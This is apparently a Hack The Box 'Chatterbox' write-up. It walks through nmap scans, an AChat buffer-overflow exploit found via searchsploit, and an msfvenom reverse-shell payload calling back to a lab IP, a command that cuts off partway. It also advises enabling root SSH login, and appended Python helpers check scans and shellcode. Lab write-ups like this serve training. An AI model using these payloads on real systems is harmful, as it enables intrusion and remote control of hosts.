HTB Chatterbox OSCP No Metasploit
Lessons Learned

Fast full-port scan when the aggressive scan is too slow:
nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn
(--min-rate 5000 with a single retry can drop ports on a lossy link, so rescan anything that looks off.)

A password must be set on root for plink.exe to connect back to Kali (sudo su; passwd root), and sshd on Kali must allow root login with a password (PermitRootLogin yes in /etc/ssh/sshd_config).

Binding a port below 1024 on Kali (for the listener or the plink remote forward) requires root.

Walkthrough

First I scan using nmap. My usual nmap -A -p- 10.10.10.74 was on schedule to take 3 hours and 30 minutes! I found this nmap option, which IS BEAUTIFUL, AMAZING, and a TIME SAVER. If a box takes too long to scan, I will definitely turn to this. It will become a staple.

nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn

I then run an aggressive scan (-A) against both of the discovered ports. AChat is in the service banner. I searchsploit it.

Use msfvenom to generate Python-formatted shellcode. Remember to include LHOST and LPORT. I changed the -p payload to windows/shell_reverse_tcp:

msfvenom LHOST=10.10.14.2 LPORT=4444 -a x86 --platform Windows -p windows/shell_reverse_tcp -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x8...
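The two-stage approach above (fast full-port sweep, then nmap -A only on what came back open) is easy to script. The following is an added example, not code from the original post: it parses nmap's grepable (-oG) output for open TCP ports and builds the follow-up aggressive scan command. The sample scan output is constructed for illustration; its host and port numbers are not a claim about the real box, and the -Pn on the follow-up scan is an assumption carried over from the author's first scan.

```python
import re
import shlex

# Constructed sample of nmap -oG output for the fast sweep (assumption: the
# real scan was run with -oG fast.gnmap). Ports and states are illustrative.
SAMPLE_GREPABLE = """# Nmap 7.93 scan initiated as: nmap -sT -p- --min-rate 5000 --max-retries 1 -Pn -oG fast.gnmap 10.10.10.74
Host: 10.10.10.74 ()\tStatus: Up
Host: 10.10.10.74 ()\tPorts: 9255/open/tcp//http?///, 9256/open/tcp//achat///, 135/filtered/tcp//msrpc///\tIgnored State: filtered (65532)
# Nmap done at Mon Jan  1 00:00:00 2024 -- 1 IP address (1 host up) scanned in 47.12 seconds
"""

# -oG port entries look like: port/state/protocol/owner/service/rpcinfo/version/
PORT_FIELD = re.compile(r"(\d+)/(\w+)/(\w+)/")


def open_ports(grepable):
    """Return {host: [open TCP ports]} from -oG text, ignoring filtered/closed entries."""
    result = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # Everything after "Ports:" up to the next tab-separated field.
        ports_blob = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto in PORT_FIELD.findall(ports_blob):
            if state == "open" and proto == "tcp":
                result.setdefault(host, []).append(int(port))
    return result


def followup_command(host, ports):
    """Build the targeted aggressive scan to run only against the open ports."""
    port_list = ",".join(str(p) for p in sorted(ports))
    return ["nmap", "-A", "-Pn", "-p", port_list, host]


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GREPABLE).items():
        print(shlex.join(followup_command(host, ports)))
```

Run the fast sweep with -oG, feed the file to open_ports, and run the printed command; the aggressive scan then finishes in seconds instead of hours because it only touches ports that are known to be open.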
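Before pasting msfvenom's -f python output into the exploit, it is worth confirming that the encoder really avoided every byte in the -b list and that the blob fits whatever size the overflow allows. The checker below is an added example, not code from the post or from the AChat exploit: it parses the buf += b"..." lines msfvenom emits and reports any bad byte with its offset. The bad-character set here is only the bytes visible in the post's truncated -b argument, plus the sample payload is a constructed stand-in; substitute the full list and the real output when using it.

```python
import re

# Constructed stand-in for `msfvenom ... -f python` output. Real output is far
# longer; these bytes only exercise the parser and the checker.
MSFVENOM_PY_OUTPUT = '''buf =  b""
buf += b"\\x50\\x50\\x59\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41"
buf += b"\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x6a\\x58\\x41\\x51"
'''

# Assumption: only the bytes visible in the post's -b list; the real list is
# cut off on the page and must be copied in full from the actual command.
BADCHARS = bytes.fromhex("0080818283")

CHUNK = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_msfvenom_python(text):
    """Concatenate every b"\\x.." literal in -f python output into raw shellcode bytes."""
    shellcode = bytearray()
    for chunk in CHUNK.findall(text):
        shellcode += bytes.fromhex(chunk.replace("\\x", ""))
    return bytes(shellcode)


def find_bad_chars(shellcode, badchars):
    """Return [(offset, byte)] for every occurrence of a forbidden byte."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_payload(text, badchars, max_len=None):
    """Parse msfvenom output and raise if it violates the bad-char list or size limit."""
    shellcode = parse_msfvenom_python(text)
    hits = find_bad_chars(shellcode, badchars)
    if hits:
        detail = ", ".join(f"0x{b:02x}@{i}" for i, b in hits)
        raise ValueError(f"bad characters present: {detail}")
    if max_len is not None and len(shellcode) > max_len:
        raise ValueError(f"payload is {len(shellcode)} bytes, limit is {max_len}")
    return shellcode


if __name__ == "__main__":
    sc = check_payload(MSFVENOM_PY_OUTPUT, BADCHARS)
    print(f"OK: {len(sc)} bytes, no bad characters")
```

The size limit is left as a parameter because the post does not state how much room the AChat overflow gives; take it from the exploit you are adapting. A payload that passes this check can still fail if the encoder needed a register hint the command did not supply, so a crash after a clean check points at the encoder options rather than at bad bytes.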